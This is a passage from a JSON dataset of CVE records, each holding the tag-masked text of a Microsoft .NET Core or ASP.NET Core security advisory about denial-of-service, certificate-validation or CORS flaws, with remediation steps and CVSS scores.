Additionally, if you've deployed self contained applications targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. How do I fix my affected application? Applications can be fixed by installing the latest .NET Core runtimes or SDKs. Typically, application servers only have runtime packages installed and developer machines have the SDKs installed. Installers for the runtimes can be downloaded from the FILETAG . .NET Core NUMBERTAG SDK installs both versions NUMBERTAG and NUMBERTAG of the .NET Core runtime. If you've built a self contained application, you must install the new runtime and SDK, recompile your application and redeploy. What if the update breaks my application? An application can be pinned to a previous version of the runtime by editing the ERRORTAG file for that application. Set the framework version to the desired version and the APITAG property to false. These settings should be treated as a temporary measure and the application updated to work with the patched versions of the framework. Since the ERRORTAG file is an optional file, you may need to create one for each application and add it alongside the executable. Acknowledgments Ben Adams URLTAG of FILETAG External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  87642. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  87643. "severity": "HIGH",
  87644. "baseScore": 7.5,
  87645. "impactScore": 3.6,
  87646. "exploitabilityScore": 3.9
  87647. },
  87648. {
  87649. "CVE_ID": "CVE-2019-0982",
  87650. "Issue_Url_old": "https://github.com/aspnet/Announcements/issues/359",
  87651. "Issue_Url_new": "https://github.com/aspnet/announcements/issues/359",
  87652. "Repo_new": "aspnet/announcements",
  87653. "Issue_Created_At": "2019-05-14T17:00:32Z",
  87654. "description": "Microsoft Security Advisory CVETAG : ASP.NET Core Denial of Service Vulnerability. Microsoft Security Advisory CVETAG : ASP.NET Core Denial of Service Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in ASP.NET Core NUMBERTAG and NUMBERTAG This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. Microsoft is aware of a denial of service vulnerability exists when ASP.NET Core improperly handles web requests. An attacker who successfully exploited this vulnerability could cause a denial of service against an ASP.NET Core web application. The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the ASP.NET Core application. The update addresses the vulnerability by correcting how the ASP.NET Core web application handles web requests. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG Affected software Any ASP.NET Core based application that uses any of following vulnerable packages: Package name | Vulnerable versions | Secure versions | | APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG APITAG Advisory FAQ APITAG APITAG How do I know if I am affected? The affected assemblies are also available separately as a APITAG package. If you are not using APITAG directly you may still be affected if you are using APITAG and the package is a transitive dependency. Direct dependencies Direct dependencies are discoverable by examining your csproj file. They can be fixed by editing the project file fixing direct dependencies or using APITAG to update the dependency. 
Transitive dependencies Transitive dependencies occur when you add a package to your project that in turn relies on another package. For example, if Contoso publishes a package APITAG which, in turn, depends on APITAG and you add the APITAG package to your project now your project has a direct dependency on APITAG and, because APITAG depends APITAG your application gains a transitive dependency on the APITAG package. Transitive dependencies are reviewable in two ways: In the Visual Studio Solution Explorer window, which supports searching. By examining the APITAG file contained in the obj directory of your project for csproj based projects The APITAG files are the authoritative list of all packages used by your project, containing both direct and transitive dependencies. There are two ways to view transitive dependencies. You can either use Visual Studio\u2019s Solution Explorer vs solution explorer , or you can review the APITAG file project assets json) . APITAG APITAG Using Visual Studio Solution Explorer To use Solution Explorer, open the project in Visual Studio, and then press Ctrl+; to activate the search in Solution Explorer. Search for the vulnerable package affected software and make a note of the version numbers of any results you find. For example, searching for APITAG in an example project that contains a package that takes a dependency on APITAG shows the following results in Visual Studio NUMBERTAG FILETAG The search results appear as a tree. In the previous results, you can see that a reference to APITAG version NUMBERTAG is discovered. Under the Dependencies node is a APITAG node. Under the APITAG node is the list of packages you have directly taken a dependency on and their versions. In screenshot, the application takes a direct dependency on APITAG . APITAG in turn has leaf nodes that list its dependencies and their versions. The APITAG package takes a dependency on a version of APITAG , that in turn takes a dependency on a version of APITAG . 
APITAG APITAG Manually reviewing FILETAG Open the FILETAG file from your project\u2019s obj directory in your editor. We suggest you use an editor that understands JSON and allows you to collapse and expand nodes to review this file. Visual Studio and Visual Studio Code provide JSON friendly editing. Search the FILETAG file for the vulnerable package affected software , using the format APITAG for each of the package names from the preceding table. If you find the assembly name in your search: Examine the line on which they are found, the version number is after the APITAG . Compare to the vulnerable versions table affected software . For example, a search result that shows APITAG is a reference to version NUMBERTAG of APITAG . If your FILETAG file includes references to the vulnerable package affected software , then you need to fix the transitive dependencies. If you have not found any reference to any vulnerable packages, this means either None of your direct dependencies depend on any vulnerable packages, or You have already fixed the problem by updating the direct dependencies. APITAG APITAG How do I fix the issue? APITAG APITAG Fixing direct dependencies Open APITAG in your editor. If you're using Visual Studio, right click the project and choose Edit APITAG from the context menu, where projectname is the name of your project. Look for APITAG elements. The following shows an example project file: CODETAG The preceding example has a reference to the vulnerable package affected software , as seen by the single APITAG element. The name of the package is in the Include attribute. The package version number is in the Version attribute. The previous example shows a single direct dependency on APITAG version NUMBERTAG To update the version to the secure package, change the version number to the updated package version as listed on the table previously affected software . 
In this example, update APITAG to the appropriate fixed package number affected software for your major version. Save the csproj file. The example csproj now looks as follows: CODETAG If you're using Visual Studio and you save your updated csproj file, Visual Studio will restore the new package version. You can see the restore results by opening the Output window APITAG and changing the Show output from drop down list to Package Manager . If you're not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore the updated dependencies. Now recompile your application. If after recompilation you see a Dependency conflict warning , you must update your other direct dependencies to versions that take a dependency on the updated package. APITAG APITAG Fixing transitive dependencies If your transitive dependency review found references to the vulnerable package affected software , you must add a direct dependency to the updated package to your csproj file to override the transitive dependency. Open APITAG in your editor. If you're using Visual Studio, right click the project and choose Edit APITAG from the context menu, where projectname is the name of your project. Look for APITAG nodes, for example: CODETAG You must add a direct dependency to the updated version of the vulnerable package affected software by adding it to the csproj file. You do this by adding a new line to the dependencies section, referencing the fixed version. For example, if your search showed a transitive reference to a vulnerable APITAG version, you'd add a reference to the fixed package number affected software . CODETAG After you've added the direct dependency reference, save your csproj file. If you're using Visual Studio, save your updated csproj file and Visual Studio will restore the new package versions. 
You can see the restore results by opening the Output window APITAG and changing the Show output from drop down list to Package Manager . If you're not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore the new dependencies. Rebuilding your application Finally, you must rebuild your application, test, and redeploy. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core or ASP.NET Core organizations. These are located at URLTAG and URLTAG The Announcements repo for each product ( URLTAG and URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  87655. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  87656. "severity": "HIGH",
  87657. "baseScore": 7.5,
  87658. "impactScore": 3.6,
  87659. "exploitabilityScore": 3.9
  87660. },
  87661. {
  87662. "CVE_ID": "CVE-2020-1161",
  87663. "Issue_Url_old": "https://github.com/aspnet/Announcements/issues/416",
  87664. "Issue_Url_new": "https://github.com/aspnet/announcements/issues/416",
  87665. "Repo_new": "aspnet/announcements",
  87666. "Issue_Created_At": "2020-05-12T22:57:19Z",
  87667. "description": "Microsoft Security Advisory CVETAG | ASP.NET Core Denial of Service Vulnerability. Microsoft Security Advisory CVETAG | ASP.NET Core Denial of Service Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET Core. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. Microsoft is aware of a denial of service vulnerability which exists when ASP.NET Core improperly handles web requests. An attacker who successfully exploited this vulnerability could cause a denial of service against an ASP.NET Core web application. The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the ASP.NET Core application. The update addresses the vulnerability by correcting how the ASP.NET Core web application handles web requests. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG Affected software Any .NET Core NUMBERTAG application running on .NET Core NUMBERTAG or lower Please note that .NET Core NUMBERTAG is now out of support and all applications should be updated to NUMBERTAG APITAG APITAG How do I know if I am affected? If you have a runtime or SDK with a version listed in affected software affected software you are exposed to the vulnerability. APITAG APITAG How do I fix the issue? To fix the issue please install the latest version of .NET Core NUMBERTAG If you have installed one or more .NET Core SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio which will also update your .NET Core SDKs. You can list the versions you have installed by running the APITAG command. 
You will see output like the following; ERRORTAG You should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or NUMBERTAG for Visual Studio NUMBERTAG or later) from FILETAG Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. Additionally, if you've deployed self contained applications URLTAG targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core APITAG organization. The main repos are located at URLTAG and URLTAG The Announcements repo ( URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  87668. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  87669. "severity": "HIGH",
  87670. "baseScore": 7.5,
  87671. "impactScore": 3.6,
  87672. "exploitabilityScore": 3.9
  87673. },
  87674. {
  87675. "CVE_ID": "CVE-2021-26423",
  87676. "Issue_Url_old": "https://github.com/dotnet/announcements/issues/194",
  87677. "Issue_Url_new": "https://github.com/dotnet/announcements/issues/194",
  87678. "Repo_new": "dotnet/announcements",
  87679. "Issue_Created_At": "2021-08-10T21:50:27Z",
  87680. "description": "Microsoft Security Advisory CVETAG | .NET Core Denial of Service Vulnerability. Microsoft Security Advisory CVETAG | .NET Core Denial of Service Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET NUMBERTAG NET Core NUMBERTAG and .NET Core NUMBERTAG This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. A denial of service vulnerability exists in .NET NUMBERTAG NET Core NUMBERTAG and .NET Core NUMBERTAG where .NET APITAG server applications providing APITAG endpoints could be tricked into endlessly looping while trying to read a single APITAG frame. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG Affected software Any .NET NUMBERTAG application running on .NET NUMBERTAG or lower Any .NET Core NUMBERTAG application running on .NET Core NUMBERTAG or lower Any .NET Core NUMBERTAG application running on .NET Core NUMBERTAG or lower APITAG APITAG How do I know if I am affected? If you have a runtime or SDK with a version listed in affected software affected software , you're exposed to the vulnerability. APITAG APITAG How do I fix the issue? To fix the issue, please install the latest version of .NET NUMBERTAG NET Core NUMBERTAG or .NET Core NUMBERTAG If you have installed one or more .NET Core SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET Core SDKs. You can list the versions you have installed by running the APITAG command. 
You should see an output like the following: ERRORTAG If you're using .NET NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from FILETAG If you're using .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or NUMBERTAG for Visual Studio NUMBERTAG or later) from FILETAG If you're using .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or NUMBERTAG from FILETAG .NET NUMBERTAG NET Core NUMBERTAG and .NET Core NUMBERTAG updates are also available from Microsoft Update. To access this either type APITAG for updates\" in your Windows search, or open Settings, choose Update & Security and then click Check for Updates. Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. Additionally, if you've deployed self contained applications URLTAG targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core or .NET NUMBERTAG please email details to EMAILTAG . Reports may qualify for the Microsoft .NET Core & .NET NUMBERTAG Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at APITAG . Support You can ask questions about this issue on APITAG in the .NET APITAG organization. The main repos are located at URLTAG and URLTAG The Announcements repo ( URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. 
Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  87681. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  87682. "severity": "HIGH",
  87683. "baseScore": 7.5,
  87684. "impactScore": 3.6,
  87685. "exploitabilityScore": 3.9
  87686. },
  87687. {
  87688. "CVE_ID": "CVE-2018-0786",
  87689. "Issue_Url_old": "https://github.com/dotnet/announcements/issues/51",
  87690. "Issue_Url_new": "https://github.com/dotnet/announcements/issues/51",
  87691. "Repo_new": "dotnet/announcements",
  87692. "Issue_Created_At": "2018-01-09T18:01:26Z",
  87693. "description": "Microsoft Security Advisory CVETAG : Security Feature Bypass in NUMBERTAG Certificate Validation. Microsoft Security Advisory CVETAG Security Feature Bypass in NUMBERTAG Certificate Validation Executive Summary Microsoft is releasing this security advisory to provide information about a vulnerability in the public versions of .NET Core NUMBERTAG and NUMBERTAG and NUMBERTAG This advisory also provides guidance on what developers can do to update their applications correctly. Microsoft is aware of a security vulnerability in the public versions of .NET Core where an attacker could present a certificate that is marked invalid for a specific use, but a component uses it for that purpose. This action disregards the Enhanced Key Usage tagging. The security update addresses the vulnerability by ensuring that .NET Core components completely validate certificates. System administrators are advised to update their .NET Core runtimes to versions NUMBERTAG and NUMBERTAG Developers are advised to update their .NET Core SDK to version NUMBERTAG or NUMBERTAG These runtime and SDK versions will also address CVETAG TODO: ADD LINK TO OTHER ISSUE Discussion Please use TODO: FILL IN ISSUE LINK for discussion of this advisory. Affected Software The vulnerability affects any Microsoft .NET Core project if it uses any of affected runtime versions listed below Runtime Version | Fixed runtime version NUMBERTAG This vulnerability also affects any .NET native applications using the following APITAG packages. APITAG Packages | Fixed APITAG Packages | APITAG NUMBERTAG contains .NET native NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG contains .NET native NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG contains .NET native NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG contains .NET native NUMBERTAG APITAG NUMBERTAG Advisory FAQ How do I know if I am affected? To check the runtimes installed on a computer you must view the contents of the runtime folder. 
By default these are | Operating System | Location | | | | | Windows | APITAG PATHTAG | | APITAG | PATHTAG | | Supported Linux platforms | PATHTAG | Each runtime version is installed in its own directory, where the directory name is the version number. If you do not have a directory for NUMBERTAG or NUMBERTAG then any applications targeting .NET Core will be vulnerable. Downloads for all supported platforms can be acquired from URLTAG How do I fix my affected application? Applications can be fixed by installing the latest runtimes or SDKs. Typically application servers only install a runtime package, developer machines install SDKs. Installers can be downloaded from the FILETAG . Runtime version NUMBERTAG will also install runtime version NUMBERTAG If you have built a self contained application URLTAG you must install the new runtime and SDK, recompile your application and redeploy. How do I fix my .NET native application? .NET native requires that applications be re processed by the .NET native compiler to incorporate the fixes and the re processed version needs to be distributed via the Windows Store. We recommend that you update your .NET UWP apps to use the latest minor version of the ERRORTAG APITAG package so that you can build and verify that your app works as expected when updated. If you are using version NUMBERTAG you should update to NUMBERTAG and if you\u2019re using NUMBERTAG you can update to NUMBERTAG Of course, you can update to a higher major version too, but we are distributing security updates for all impacted major versions (currently NUMBERTAG and NUMBERTAG Additionally, whether or not you update your APITAG packages, all applications submitted to the store after today will be automatically fixed during submission processing. If you do not update your app in the Store, it will automatically be reprocessed and distributed via an application update in the next few weeks. 
Users who have automatic app updates enabled will get the fix with no intervention on your or their parts. Because updated apps are distributed through the Windows Store, sideloaded apps will not be automatically updated. We recommend that developers who distribute sideloaded apps update the affected APITAG packages, rebuild their applications and distribute them to their users. Microsoft is committed to keeping UWP applications secure and to supporting developers. If you have feedback on the fix distribution process, please let us know at EMAILTAG . Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including Terms and Conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core or ASP.NET Core organizations. These are located at URLTAG and URLTAG The Announcements repo for each product ( URLTAG and URLTAG will contain this bulletin as an issue and will include a link to a discussion issue where you can ask questions. What if the update breaks my application? An application can be pinned to a previous version of the runtime by editing the APITAG URLTAG file for that application and editing the framework version and setting APITAG to false . This should be treated as a temporary measure and the application updated to work with the patched versions of the framework. Note that this file is optional, you may need to create it for each application alongside the executable. External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  87694. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  87695. "severity": "HIGH",
  87696. "baseScore": 7.5,
  87697. "impactScore": 3.6,
  87698. "exploitabilityScore": 3.9
  87699. },
  87700. {
  87701. "CVE_ID": "CVE-2019-0545",
  87702. "Issue_Url_old": "https://github.com/dotnet/announcements/issues/94",
  87703. "Issue_Url_new": "https://github.com/dotnet/announcements/issues/94",
  87704. "Repo_new": "dotnet/announcements",
  87705. "Issue_Created_At": "2019-01-08T18:00:23Z",
  87706. "description": "Microsoft Security Advisory CVETAG : .NET Core Information Disclosure Vulnerability. Microsoft Security Advisory CVETAG : .NET Core Information Disclosure Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET Core NUMBERTAG and NUMBERTAG This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. Microsoft is aware of an information disclosure vulnerability that exists in .NET Framework and .NET Core and allows Cross origin Resource Sharing (CORS) configurations to be bypassed. An attacker who successfully exploited the vulnerability could retrieve content from a web application that would normally be restricted. The security update addresses the vulnerability by enforcing the CORS configuration to prevent its bypass. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG Affected software Any .NET Core based application that uses the FILETAG package with a vulnerable version listed below. Package name | Vulnerable versions | Secure versions | | APITAG NUMBERTAG APITAG APITAG Advisory FAQ APITAG APITAG How do I know if I am affected? Applications that use APITAG APITAG is distributed as part of the .NET Core NUMBERTAG runtime. To check the currently installed runtimes, open a command prompt and run the APITAG command. If you have a NUMBERTAG or greater runtime installed, you'll see output like the following; ERRORTAG If your host version is NUMBERTAG and the highest APITAG runtime version is less than NUMBERTAG you're vulnerable to this issue. If your host version is NUMBERTAG and the highest NUMBERTAG APITAG runtime version is less than NUMBERTAG you're vulnerable to this issue. You will not see SDK versions if you have only installed the runtime. 
Applications not using APITAG The affected assembly is also available separately as a APITAG package. If you are not using APITAG you may still be affected if you are referencing the packages listed above. Direct dependencies Direct dependencies are discoverable by examining your csproj file. They can be fixed by editing the project file fixing direct dependencies or using APITAG to update the dependency. Transitive dependencies Transitive dependencies occur when you add a package to your project that in turn relies on another package. For example, if Contoso publishes a package APITAG which, in turn, depends on APITAG and you add the APITAG package to your project now your project has a direct dependency on APITAG and, because APITAG depends APITAG your application gains a transitive dependency on the APITAG package. Transitive dependencies are reviewable in two ways: In the Visual Studio Solution Explorer window, which supports searching. By examining the APITAG file contained in the obj directory of your project for csproj based projects The APITAG files are the authoritative list of all packages used by your project, containing both direct and transitive dependencies. There are two ways to view transitive dependencies. You can either use Visual Studio\u2019s Solution Explorer vs solution explorer , or you can review the APITAG file project assets json) . APITAG APITAG Using Visual Studio Solution Explorer To use Solution Explorer, open the project in Visual Studio, and then press Ctrl+; to activate the search in Solution Explorer. Search for the vulnerable package affected software and make a note of the version numbers of any results you find. For example, searching for APITAG in an example project that contains a package that takes a dependency on APITAG shows the following results in Visual Studio NUMBERTAG FILETAG The search results appear as a tree. In the previous results, you can see that a reference to APITAG version NUMBERTAG is discovered. 
Under the Dependencies node is a APITAG node. Under the APITAG node is the list of packages you have directly taken a dependency on and their versions. In screenshot, the application takes a direct dependency on APITAG . APITAG in turn has leaf nodes that list its dependencies and their versions. The APITAG package takes a dependency on a version of APITAG , that in turn takes a dependency on a version of APITAG . APITAG APITAG Manually reviewing FILETAG Open the FILETAG file from your project\u2019s obj directory in your editor. We suggest you use an editor that understands JSON and allows you to collapse and expand nodes to review this file. Visual Studio and Visual Studio Code provide JSON friendly editing. Search the FILETAG file for the vulnerable package affected software , using the format APITAG for each of the package names from the preceding table. If you find the assembly name in your search: Examine the line on which they are found, the version number is after the APITAG . Compare to the vulnerable versions table affected software . For example, a search result that shows APITAG is a reference to version NUMBERTAG of APITAG . If your FILETAG file includes references to the vulnerable package affected software , then you need to fix the transitive dependencies. If you have not found any reference to any vulnerable packages, this means either None of your direct dependencies depend on any vulnerable packages, or You have already fixed the problem by updating the direct dependencies. APITAG APITAG How do I fix the issue? Updating the version of APITAG If your host version is a NUMBERTAG host you must install version NUMBERTAG or later of the FILETAG , or corresponding FILETAG . If your host version is a NUMBERTAG you must install version NUMBERTAG or later of the FILETAG , or corresponding FILETAG . APITAG APITAG Fixing direct dependencies Open APITAG in your editor. 
If you're using Visual Studio, right click the project and choose Edit APITAG from the context menu, where projectname is the name of your project. Look for APITAG elements. The following shows an example project file: CODETAG The preceding example has a reference to the vulnerable package affected software , as seen by the single APITAG element. The name of the package is in the Include attribute. The package version number is in the Version attribute. The previous example shows a single direct dependency on APITAG version NUMBERTAG To update the version to the secure package, change the version number to the updated package version as listed on the table previously affected software . In this example, update APITAG to the appropriate fixed package number affected software for your major version. Save the csproj file. The example csproj now looks as follows: CODETAG If you're using Visual Studio and you save your updated csproj file, Visual Studio will restore the new package version. You can see the restore results by opening the Output window APITAG and changing the Show output from drop down list to Package Manager . If you're not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore the updated dependencies. Now recompile your application. If after recompilation you see a Dependency conflict warning , you must update your other direct dependencies to versions that take a dependency on the updated package. APITAG APITAG Fixing transitive dependencies If your transitive dependency review found references to the vulnerable package affected software , you must add a direct dependency to the updated package to your csproj file to override the transitive dependency. Open APITAG in your editor. If you're using Visual Studio, right click the project and choose Edit APITAG from the context menu, where projectname is the name of your project. 
Look for APITAG nodes, for example: CODETAG You must add a direct dependency to the updated version of the vulnerable package affected software by adding it to the csproj file. You do this by adding a new line to the dependencies section, referencing the fixed version. For example, if your search showed a transitive reference to a vulnerable APITAG version, you'd add a reference to the fixed package number affected software . CODETAG After you've added the direct dependency reference, save your csproj file. If you're using Visual Studio, save your updated csproj file and Visual Studio will restore the new package versions. You can see the restore results by opening the Output window APITAG and changing the Show output from drop down list to Package Manager . If you're not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore the new dependencies. Rebuilding your application Finally, you must rebuild your application, test, and redeploy. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core or ASP.NET Core organizations. These are located at URLTAG and URLTAG The Announcements repo for each product ( URLTAG and URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. 
In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  87707. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  87708. "severity": "HIGH",
  87709. "baseScore": 7.5,
  87710. "impactScore": 3.6,
  87711. "exploitabilityScore": 3.9
  87712. },
  87713. {
  87714. "CVE_ID": "CVE-2017-11883",
  87715. "Issue_Url_old": "https://github.com/aspnet/Announcements/issues/278",
  87716. "Issue_Url_new": "https://github.com/aspnet/announcements/issues/278",
  87717. "Repo_new": "aspnet/announcements",
  87718. "Issue_Created_At": "2017-11-14T15:25:03Z",
  87719. "description": "Reserved. APITAG issue has been reserved for a potential future security announcement._ This does not mean a security advisory is coming soon, it simply gives us the ability to predict the issue number that will be used in the future.",
  87720. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  87721. "severity": "HIGH",
  87722. "baseScore": 7.5,
  87723. "impactScore": 3.6,
  87724. "exploitabilityScore": 3.9
  87725. },
  87726. {
  87727. "CVE_ID": "CVE-2018-8269",
  87728. "Issue_Url_old": "https://github.com/aspnet/Announcements/issues/385",
  87729. "Issue_Url_new": "https://github.com/aspnet/announcements/issues/385",
  87730. "Repo_new": "aspnet/announcements",
  87731. "Issue_Created_At": "2019-09-10T17:02:22Z",
  87732. "description": "Microsoft Security Advisory CVETAG : Denial of Service Vulnerability in APITAG Microsoft Security Advisory CVETAG : Denial of Service Vulnerability in APITAG APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in ASP.NET Core. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. Microsoft is aware of a denial of service vulnerability in the Microsoft APITAG library used in ASP.NET that could cause a denial of service against an APITAG web application. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the APITAG application. The update addresses the vulnerability by updating the version of APITAG ASP.NET Core uses. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors If your application does not use ASP.NET Core's APITAG implementation or your application does not use Azure Storage to store data protection keys you are not affected. APITAG APITAG Affected software Any ASP.NET Core based application that uses APITAG or APITAG with a vulnerable version listed below. Any ASP.NET Core based application that uses the APITAG shared framework with a vulnerable version listed below. Package name | Vulnerable versions | Secure versions | | APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG | APITAG NUMBERTAG APITAG NUMBERTAG APITAG APITAG How do I know if I am affected? .NET Core has two types of dependencies: direct and transitive. Direct dependencies are dependencies where you specifically add a package to your project, transitive dependencies occur when you add a package to your project that in turn relies on another package. For example, the APITAG package depends on the APITAG package. When you add a dependency on APITAG in your project, you're taking a transitive dependency on APITAG . 
Any application that has a direct or transitive dependency on the affected package affected software can be exposed to the vulnerability if it does not meet any of the mitigation factors mitigation factors . APITAG APITAG How do I fix the issue? To fix the issue please install the latest version of .NET Core. If you have multiple versions of .NET Core installed you will need to install multiple runtimes, or SDKs depending on what you have installed. If you have .NET Core NUMBERTAG or greater installed, you can list the versions you have installed by running the APITAG command. You will see output like the following; ERRORTAG For machines running .NET Core NUMBERTAG you should download Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from FILETAG For machines running .NET Core NUMBERTAG you should download Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from FILETAG If you have both NUMBERTAG and NUMBERTAG you need to install updates for both versions. Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. If you have pinned your application URLTAG to a specific version of the runtime, you must update your app, recompile and redeploy it for the update to take effect. The affected assemblies are also available separately as a APITAG package. Even if you are not using APITAG or APITAG directly you may still be affected if either package is a transitive dependency. Direct dependencies Direct dependencies are discoverable by examining your csproj file. They can be fixed by editing the project file fixing direct dependencies or using APITAG to update the dependency. Transitive dependencies 